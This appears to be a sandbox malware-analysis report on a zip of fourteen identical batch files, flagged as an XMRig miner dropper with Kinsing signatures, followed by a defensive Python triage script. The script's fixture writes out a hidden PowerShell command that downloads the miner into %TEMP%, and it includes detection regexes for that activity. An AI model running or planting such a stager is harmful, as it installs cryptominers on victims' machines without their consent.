General

  • Target

    NM.zip

  • Size

    8KB

  • Sample

    240124-fqzg1abcgn

  • MD5

    afdb6e69ea3871a344893fa2494c5f74

  • SHA1

    20a0c292f69761c186a07f3643492c2605e5a075

  • SHA256

    04cf0194fb37bcc19b2b63904d84a74c720b64b7938620fdf971bb98a8f47ccd

  • SHA512

    156c21ecf75a96ba1886fa9ce90e9074de4b88f62545bdd1dbedc0346cb5b55b23317135c264db60a975e410d08e2059d78532358247fb9db37249ddba112f2f

  • SSDEEP

    96:IP2bBP22P2vP2AP2mP2fP2hKP2ZP2qP2zP2EP2NP2DP2oP20wKk:i8BC/j8GE+/IpqEDwKk

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

    (empty)

  • URLs

    exe.dropper: https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip

Targets

    • Target

      tesy - Copy (10).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    • Kinsing

      Kinsing is a loader written in Golang.

    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (11).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    • Kinsing

      Kinsing is a loader written in Golang.

    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (12).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    • Kinsing

      Kinsing is a loader written in Golang.

    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (13).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    • Kinsing

      Kinsing is a loader written in Golang.

    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (14).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (2).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (3).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (4).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (5).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (6).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (7).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (8).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (9).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy.bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy.bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE
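The report above lists fourteen batch files in one zip that all share a single SHA-256, plus an extracted PowerShell dropper that fetches the stock XMRig release zip from GitHub. The script below is an added triage example, not part of the sandbox report or of the sample itself: it hashes every zip member, collapses byte-identical copies so each unique payload is analysed once, pulls URLs out of the embedded PowerShell, and flags a member that launches powershell or references the xmrig release path. The member contents are constructed for the example (the page does not reproduce tesy.bat); only the download URL is taken from the report, and the heuristics are the author's, not sandbox signatures.

```python
"""Triage a zip of batch droppers: hash members, collapse duplicates, pull URLs."""
import hashlib
import io
import re
import zipfile

# The only indicator taken from the report; everything else below is constructed.
MINER_URL = ("https://github.com/xmrig/xmrig/releases/download/"
             "v6.21.0/xmrig-6.21.0-gcc-win64.zip")

# Hypothetical member contents: a one-line PowerShell fetch and a benign file.
STAGER_BAT = (
    "@echo off\r\n"
    f'powershell -nop -w hidden -c "iwr {MINER_URL} -OutFile %TEMP%\\m.zip"\r\n'
)
BENIGN_BAT = "@echo off\r\necho hello\r\n"

# Heuristics for flagging batch content (author's own, not sandbox signatures).
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)
POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b", re.IGNORECASE)
MINER_RELEASE_RE = re.compile(r"github\.com/xmrig/xmrig/releases/download/",
                              re.IGNORECASE)


def build_sample_zip():
    """Pack three byte-identical stagers and one benign file into an in-memory zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name in ("tesy.bat", "tesy - Copy.bat", "tesy - Copy (2).bat"):
            zf.writestr(name, STAGER_BAT)
        zf.writestr("readme.bat", BENIGN_BAT)
    return buf.getvalue()


def triage_zip(zip_bytes):
    """Return findings keyed by SHA-256 of member content.

    Each entry records every member name sharing that content (so fourteen
    copies collapse to one analysis), the MD5 for cross-referencing with other
    sandboxes, the URLs found in the text, and the reasons it was flagged.
    """
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            sha256 = hashlib.sha256(data).hexdigest()
            entry = findings.setdefault(sha256, {
                "names": [],
                "size": len(data),
                "md5": hashlib.md5(data).hexdigest(),
                "urls": [],
                "flags": [],
            })
            entry["names"].append(info.filename)
            if len(entry["names"]) > 1:
                continue  # same bytes already analysed; only record the alias
            text = data.decode("utf-8", errors="replace")
            entry["urls"] = sorted(set(URL_RE.findall(text)))
            if POWERSHELL_RE.search(text):
                entry["flags"].append("launches powershell")
            if any(MINER_RELEASE_RE.search(u) for u in entry["urls"]):
                entry["flags"].append("fetches xmrig release")
    return findings


def suspicious(findings):
    """SHA-256 digests whose content carried at least one flag."""
    return sorted(h for h, e in findings.items() if e["flags"])


if __name__ == "__main__":
    for digest, entry in triage_zip(build_sample_zip()).items():
        print(digest[:16], entry["size"], "B", len(entry["names"]), "file(s)",
              entry["flags"] or "clean")
```

Feeding the real NM.zip to triage_zip would reduce the fourteen entries in the report to a single analysis keyed by 97db0437… with fourteen aliases; the URL regex is deliberately loose because batch files quote and escape inconsistently, so review the extracted list rather than trusting it blindly.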
